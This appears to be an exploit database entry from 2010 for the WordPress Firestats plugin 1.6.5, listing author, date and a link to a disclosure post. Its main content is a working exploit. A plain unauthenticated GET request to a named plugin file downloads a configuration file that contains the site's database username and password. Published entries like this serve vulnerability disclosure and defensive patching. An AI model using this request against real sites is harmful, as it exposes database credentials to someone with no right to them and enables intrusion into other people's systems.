WordPress Plugin Firestats - Remote Configuration File Download
| EKU-ID: 20815 | CVE: | OSVDB-ID: |
| Author: Jelmer de Hen | Published: 2010-07-09 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 20815 | CVE: | OSVDB-ID: |
| Author: Jelmer de Hen | Published: 2010-07-09 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
# Exploit Title: Wordpress firestats remote configuration file download # Date: 2010-07-09 # Author: Jelmer de Hen # Software Link: http://firestats.cc/ # Version: 1.6.5 # Tested on: PHP Do a simple GET request to this file: /wp-content/plugins/firestats/php/tools/get_config.php This will allow you to download a configuration file which contains the database username and password. http://h.ackack.net/more-0day-wordpress-security-leaks-in-firestats.html